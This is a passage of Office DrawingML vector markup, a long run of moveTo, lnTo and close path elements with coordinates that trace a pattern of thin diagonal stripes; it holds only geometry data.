                  <a:pt x="19174099" y="26946980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19054070" y="26946982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="7892915"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="7525863"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19421123" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19301096" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="7645891"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="7278839"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19668144" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19548114" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="7398868"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="7031816"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19915168" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19795138" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="7151845"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="6784792"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20162191" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20042161" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="6904821"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="6537769"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20409215" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20289185" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="6657797"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="6290745"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20656238" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20536210" y="26946980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="6410774"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="6043722"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20903262" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20783233" y="26946980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="6163751"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2" y="5796695"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21150288" y="26946976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21030257" y="26946980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="5916727"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="5549674"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21397309" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21277283" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="5669703"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="5302651"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21644338" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21524306" y="26946982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="5422680"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2" y="5055625"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21891359" y="26946982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21771333" y="26946980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="5175656"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="4808604"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="22138379" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22018356" y="26946980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="4928633"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="4561580"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="22385403" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22265374" y="26946980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="4681609"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="4314557"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="22632426" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22512398" y="26946980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="4434588"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="4067533"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="22879450" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22759421" y="26946980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4187559"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="3820510"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23126473" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23006445" y="26946980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="3940541"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="3573492"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23373491" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23253463" y="26946980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="3693521"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="3326468"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23620515" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23500486" y="26946980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="3446502"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="3079445"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23867538" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23747515" y="26946980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="3199468"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="2832427"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952872" y="26785295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="26905324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2952458"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="2585397"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="26538263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="26658294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="2705426"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="2338374"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952872" y="26291236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="26411265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="2458403"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="2091350"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="26044215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="26164253"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="2211385"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="1844332"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="25797198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="25917226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="1964361"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2" y="1597300"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="25550168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="25670197"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="1717336"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="1350280"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="25303145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="25423176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1470306"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2" y="1103265"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="25056133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="25176150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="1223285"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7" y="856241"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952872" y="24809106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="24929126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="976261"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="609215"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="24562080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="24682097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="729232"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="362185"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952872" y="24315048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952872" y="24435087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="482219"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="115162"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="24068027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="24188066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="235202"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20634699" y="4"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="3318175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="3438193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20514677" y="6"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="23725953" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23845980" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="106891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="226919"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="23478929" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23598962" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="353909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="473942"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="23231917" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23351944" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="600927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="720955"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="22984876" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23104912" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="847959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="967992"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="22857891" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="1094980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="1215010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22737861" y="6"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="22490835" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="22610871" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="1342001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="1462033"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="22243833" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="22363867" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="1589001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="1709037"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="22116832" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="1836039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="1956050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21996824" y="6"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="21749786" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21869803" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="2083068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="2203084"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="21622790" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="2330081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="2450116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21502754" y="6"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="21255733" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21375778" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="2577090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="2697134"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="21128748" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="2824121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="2944158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21008713" y="6"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20881709" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="3071162"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="3191170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20761700" y="6"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20267634" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20387686" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="3565184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="3685234"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="19773592" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19893631" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="4059240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="4179278"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="19526569" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19646593" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="4306277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="4426302"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="19032539" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19152560" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="4800307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952865" y="4920329"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18785510" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18905523" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="5047348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="5167360"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18411484" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952866" y="5541383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="5661411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18291460" y="6"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18164455" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="5788415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="5908436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18044436" y="4"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="16929343" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="7023527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="7143564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16809307" y="4"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20140638" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="3812233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="3932246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20020621" y="2"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="19399573" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952866" y="4553295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="4673314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19279557" y="2"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18658491" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="5294380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="5414401"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18538469" y="2"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17797415" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17917440" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="6035433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="6155457"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17550385" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17670422" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="6282451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="6402486"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17303356" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17423401" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="6529469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="6649515"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17056339" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17176373" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="6776495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="6896530"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="16562297" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16682320" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="7270551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="7390574"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="16315263" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16435302" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="7517569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="7637606"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="16068233" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16188267" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="7764603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="7884638"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="15821221" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15941238" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="8011633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="8131650"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="15574192" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15694220" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="8258651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="8378679"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="15327180" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15447207" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="8505661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="8625689"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="15080145" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15200170" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="8752702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="8872721"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="14833116" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14953149" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="8999720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="9119756"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="14586104" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14706120" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="9246752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="9366768"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="14339086" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14459130" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="9493742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="9613786"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="14212090" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952870" y="9740782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="9860812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14092059" y="4"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="13845039" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13965055" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="9987817"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="10107830"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="13598021" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13718031" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="10234840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="10354848"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="13350986" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13471011" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="10481864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="10601883"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="13103968" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13224007" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="10728865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="10848900"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12856950" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12976972" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="10975899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="11095921"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12609915" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12729954" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="11222918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="11342956"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12482919" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952870" y="11469952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="11589974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12362900" y="4"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12115885" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12235893" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="11716979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="11836986"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11868856" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11988883" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="11963988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="12084013"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11621821" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11741860" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="12211012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="12331050"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11374809" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11494836" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="12458032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="12578062"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11127791" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11247812" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="12705058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="12825080"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10880767" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11000806" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="12952065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="13072098"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10633849" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10753760" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="13199111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="13319020"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10386814" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10506853" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="13446013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="13566054"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10139796" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10259827" y="4"/>
                </a:lnTo>
                <a:lnTo>
